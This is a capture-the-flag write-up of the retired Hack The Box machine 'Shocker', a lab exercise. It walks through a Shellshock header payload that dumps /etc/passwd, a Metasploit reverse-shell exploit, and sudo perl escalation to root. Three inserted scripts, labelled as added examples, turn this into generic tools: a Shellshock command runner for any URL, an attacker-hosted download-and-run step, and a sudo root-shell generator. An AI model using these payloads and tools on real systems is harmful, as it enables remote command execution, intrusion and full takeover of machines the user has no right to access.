Hack the Box Shocker

Arcy Caparros
8 min read, Mar 26, 2020


My write-up on HTB’s retired machine “Shocker”, covering both Metasploit usage and manual exploitation.

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Reconnaissance

First, let’s use nmapAutomator to automate recon and enumeration.

Summary of our nmap scan results:

Nmap scan report for 10.10.10.56
Host is up (0.087s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
|_ CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I tried several different nmap scans to make sure I had not missed a port, but they all came back with only tcp/80 and tcp/2222 open.

Enumeration

I started browsing http://10.10.10.56 to see if I could find more information.

So far, nothing stands out…

The next step is to run dirbuster with a broad scan to identify any directories or files.

Going through the directories dirbuster identified, I found a file that can give us more information: “http://10.10.10.56/cgi-bin/user.sh”.

curl -v http://10.10.10.56/cgi-bin/user.sh
*   Trying 10.10.10.56:80...
* TCP_NODELAY set
* Connected to 10.10.10.56 (10.10.10.56) port 80 (#0)
> GET /cgi-bin/user.sh HTTP/1.1
> Host: 10.10.10.56
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Wed, 18 Mar 2020 19:39:49 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Transfer-Encoding: chunked
< Content-Type: text/x-sh
<
Content-Type: text/plain
Just an uptime test script
15:39:49 up 1:30, 0 users, load average: 0.00, 0.00, 0.00
* Connection #0 to host 10.10.10.56 left intact

Taking the curl request a step further, we supply a Shellshock payload in a custom request header. Apache passes every request header to the CGI script as an environment variable, and a vulnerable bash executes the commands that follow the function definition:

root@Bugok:/home/arcy24/Documents/tools/nmapAutomator/10.10.10.56# curl -v http://10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
* Trying 10.10.10.56:80...
* TCP_NODELAY set
* Connected to 10.10.10.56 (10.10.10.56) port 80 (#0)
> GET /cgi-bin/user.sh HTTP/1.1
> Host: 10.10.10.56
> User-Agent: curl/7.68.0
> Accept: */*
> custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Wed, 18 Mar 2020 19:49:13 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash
* Connection #0 to host 10.10.10.56 left intact

Now that we have confirmed that the Shellshock vulnerability (CVE-2014-6271) is present on the host, the next step is to exploit it with Metasploit.

Exploitation

Initial Foothold

Metasploit

msfdb start
[+] Starting database
msfconsole
[*] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v5.0.79-dev ]
+ -- --=[ 1979 exploits - 1088 auxiliary - 339 post ]
+ -- --=[ 563 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 >

After loading ‘msfconsole’, next step is to search for shellshock

msf5 > search shellshock

Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
1 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
2 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
3 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
4 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
5 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
6 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
9 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
10 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
11 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
msf5 >

The closest match is #5, ‘exploit/multi/http/apache_mod_cgi_bash_env_exec’ (Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)).

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:

Id Name
-- ----
0 Linux x86
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) >

Set RHOSTS (10.10.10.56) and TARGETURI (/cgi-bin/user.sh); the rest can be left as is. Once a reverse payload is selected, LHOST must also be set to the attacker’s address so the shell can connect back.

Set payload

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp

I did have some issues running the exploit: Metasploit kept giving me an error about RPATH, but after I re-set it to the same value, ‘/bin’, it started working.

Last step is to run the exploit.

User flag obtained. Note that the session runs as shelly rather than www-data: Apache on this box executes the CGI script as that user, so the initial foothold already lands in the account that owns user.txt.

id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
pwd
/usr/lib/cgi-bin
cd /home
ls
shelly
cd shelly
ls
user.txt

Non-Metasploit Way

Search for ‘apache cgi’ exploits

Searchsploit

Since we were successful with the Metasploit module ‘exploit/multi/http/apache_mod_cgi_bash_env_exec’, the closest match in our searchsploit results is ‘Apache mod_cgi — ‘Shellshock’ Remote Command Injection’.

I did not have to edit the Python exploit; it ran as is and gave me a shell as user ‘shelly’.

10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
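As an added example, not the write-up’s code and not the exploit-db script, here is a small curl-based probe that does by hand what the manual curl request earlier and the Python exploit do: a non-destructive check that asks the target to echo a unique marker, and a command runner through the same header. It assumes curl is installed on the attacker host and that the target URL points at a bash CGI script.

```shell
#!/bin/sh
# Added example (not from the write-up): curl-based Shellshock probe.
# Assumptions: curl is installed; the URL is a bash CGI script.

# Build the header value. A vulnerable bash imports any environment
# variable that starts with "() {" as a function definition and then
# executes whatever follows the closing brace. The Content-Type line and
# the blank line (the second echo) make the command output a valid CGI
# response, so Apache returns 200 with the output instead of a 500.
shellshock_payload() {
    printf '() { :; }; echo Content-Type: text/plain; echo; %s' "$1"
}

# Return 0 only if MARKER occupies a whole line of BODY. A server that
# merely reflects request headers would contain "echo MARKER" inside a
# longer line, which must not be counted as execution.
marker_executed() {
    printf '%s\n' "$1" | grep -qx -- "$2"
}

# Non-destructive check: ask the target to echo a unique marker. Any
# header name works because mod_cgi exports every request header as an
# HTTP_* environment variable; User-Agent is the conventional choice.
shellshock_check() {
    url=$1
    header=${2:-User-Agent}
    marker="shock$$$(date +%s)"
    body=$(curl -s -m 10 -H "$header: $(shellshock_payload "echo $marker")" "$url")
    if marker_executed "$body" "$marker"; then
        echo "VULNERABLE: $url via $header"
        return 0
    fi
    echo "not vulnerable (or not a bash CGI): $url"
    return 1
}

# Run an arbitrary command through the same header and print its output.
shellshock_exec() {
    url=$1
    shift
    curl -s -m 10 -H "${HEADER:-User-Agent}: $(shellshock_payload "$*")" "$url"
}

case ${1:-} in
    check) shellshock_check "$2" "${3:-User-Agent}" ;;
    exec)  url=$2; shift 2; shellshock_exec "$url" "$@" ;;
    *)     echo "usage: $0 check URL [HEADER] | exec URL COMMAND..." ;;
esac
```

Usage: `sh shock.sh check http://10.10.10.56/cgi-bin/user.sh` confirms execution without touching anything on the box; `sh shock.sh exec http://10.10.10.56/cgi-bin/user.sh id` runs a command. The marker check on a whole line is what keeps a server that echoes request headers back from being reported as vulnerable.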

Privilege Escalation

LinEnum is a great tool for privilege-escalation triage: the script automates the checks you would otherwise perform by hand for sudo rights, user information, system information, running services and so on.

Transferring LinEnum

We have to find a way to copy LinEnum.sh from the attacker machine to the ‘Shocker’ host.

First step is to start a Python HTTP server on the attacker host (Kali) in another terminal.

Second step is to run wget on the victim machine (Shocker) to download LinEnum.sh from the attacker host.

Once the transfer is complete, execute LinEnum.sh.
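The transfer procedure above as shell functions, added here as an example rather than taken from the write-up, with a digest check so the copy that lands on the target is verified before it is executed. It assumes python3 on the attacker host and either wget or curl on the target.

```shell
#!/bin/sh
# Added example (not from the write-up): serve, fetch and verify a tool.
# Assumptions: python3 on the attacker host; wget or curl on the target.

# Attacker side (run in a second terminal): serve the directory that
# holds LinEnum.sh over plain HTTP.
serve_dir() {
    dir=${1:-.}
    port=${2:-8000}
    ( cd "$dir" && python3 -m http.server "$port" )
}

# Target side: download with whatever client the box has.
fetch_tool() {
    url=$1
    out=$2
    if command -v wget >/dev/null 2>&1; then
        wget -q -O "$out" "$url"
    elif command -v curl >/dev/null 2>&1; then
        curl -s -f -o "$out" "$url"
    else
        echo "neither wget nor curl on target; use another channel" >&2
        return 1
    fi
}

# Digest of a file: sha256sum when available, POSIX cksum otherwise.
# Both sides must use the same tool for the values to be comparable.
file_digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        cksum "$1" | cut -d' ' -f1
    fi
}

# Return 0 when FILE hashes to EXPECTED, the digest computed on the
# attacker host before the file was served.
verify_copy() {
    [ "$(file_digest "$1")" = "$2" ]
}

case ${1:-} in
    serve)  serve_dir "${2:-.}" "${3:-8000}" ;;
    digest) file_digest "$2" ;;
    fetch)  fetch_tool "$2" "$3" && verify_copy "$3" "$4" && chmod +x "$3" ;;
    *)      echo "usage: $0 serve [DIR] [PORT] | digest FILE | fetch URL OUT EXPECTED_DIGEST" ;;
esac
```

On the attacker host, `sh xfer.sh digest LinEnum.sh` gives the expected value and `sh xfer.sh serve . 8000` starts the server; on the target, `sh xfer.sh fetch http://ATTACKER:8000/LinEnum.sh /tmp/LinEnum.sh EXPECTED_DIGEST` downloads, verifies and marks the script executable in one step, refusing to continue if the copy does not match.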

LinEnum Results

Since the LinEnum output is quite large, I will only include the part that led to root. Reviewing the output, the line ‘It looks like we have some admin users’ caught my attention.

Running ‘sudo -l’ tells us that user shelly may run the following command on Shocker without a password:
(root) NOPASSWD: /usr/bin/perl

Because perl can exec any program, running sudo perl -e ‘exec “/bin/bash”;’ gives us a root shell. LinEnum also lists shelly in the lxd group (110), another well-known route to root on Ubuntu, but the sudo entry is the more direct path.

[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

'shelly' account has admin priv??

[+] We can sudo without supplying a password!
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

[+] Possible sudo pwnage!
/usr/bin/perl

[-] Accounts that have recently used sudo:
/home/shelly/.sudo_as_admin_successful

Executed 'sudo -l' to confirm that running perl as root does not require a password:

sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

sudo perl -e 'exec "/bin/bash";'
id
uid=0(root) gid=0(root) groups=0(root)

We have root!!!!

cd /root
ls
root.txt
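As an added example, not part of the write-up, the triage LinEnum performs on ‘sudo -l’ output as a small script, generalised from the perl entry on Shocker to the other interpreters that are commonly left in NOPASSWD rules. The sample ‘sudo -l’ output embedded in it is constructed to match what the write-up shows for shelly; the interpreter one-liners are the standard exec tricks, and the names of the functions are my own.

```shell
#!/bin/sh
# Added example (not from the write-up): triage `sudo -l` output for
# NOPASSWD entries and suggest the root-shell one-liner for interpreters.

# Constructed sample, matching the sudo -l output shown for shelly.
SAMPLE_SUDO_L='Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl'

# Read `sudo -l` output on stdin and print "runas=<user> cmd=<spec>" for
# every command that can be run without a password (one per comma-
# separated command in a NOPASSWD line).
nopasswd_entries() {
    awk '
        /NOPASSWD:/ {
            runas = "?"
            if (match($0, /\([^)]*\)/)) {
                runas = substr($0, RSTART + 1, RLENGTH - 2)
            }
            sub(/.*NOPASSWD:[ \t]*/, "")
            n = split($0, cmds, ",[ \t]*")
            for (i = 1; i <= n; i++) print "runas=" runas " cmd=" cmds[i]
        }'
}

# For a spec that is a bare binary, print the sudo command that yields an
# interactive root shell. Specs with arguments are pinned in sudoers, so
# the interpreter trick would not match them and nothing is printed.
# env_reset and secure_path (both set on Shocker) strip PATH and
# LD_PRELOAD style tricks, so the binary must be named by its full path.
root_shell_for() {
    spec=$1
    case $spec in
        *' '*) return 0 ;;
    esac
    case ${spec##*/} in
        perl)                   echo "sudo $spec -e 'exec \"/bin/bash\";'" ;;
        python|python2|python3) echo "sudo $spec -c 'import os; os.execl(\"/bin/bash\", \"bash\")'" ;;
        ruby)                   echo "sudo $spec -e 'exec \"/bin/bash\"'" ;;
        awk|gawk|mawk)          echo "sudo $spec 'BEGIN { system(\"/bin/bash\") }'" ;;
        bash|sh|dash|zsh)       echo "sudo $spec" ;;
        ALL)                    echo "sudo /bin/bash" ;;
        *)                      echo "# $spec: no built-in trick, check GTFOBins for this binary" ;;
    esac
}

# Print every NOPASSWD entry followed by the matching root-shell command.
triage() {
    nopasswd_entries | while IFS= read -r entry; do
        echo "$entry"
        root_shell_for "${entry#*cmd=}" | sed 's/^/    /'
    done
}

# With --live, read the real sudo -l output (non-interactive, so a
# password prompt fails silently); otherwise demonstrate on the sample.
if [ "${1:-}" = "--live" ]; then
    sudo -n -l 2>/dev/null | triage
else
    printf '%s\n' "$SAMPLE_SUDO_L" | triage
fi
```

Run without arguments it prints the Shocker entry and the perl one-liner from the write-up; `sh sudo_triage.sh --live` runs the same logic against the current user’s real sudo rights.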

Lessons Learned

  • A better understanding of working with curl and bash commands.
  • There is a huge difference between using Metasploit and exploiting manually, but ‘we have to try harder’.
  • As always, keep your systems up to date on patches.

References

  1. https://www.exploit-db.com/search?q=shellshock&type=remote
  2. https://github.com/rebootuser/LinEnum
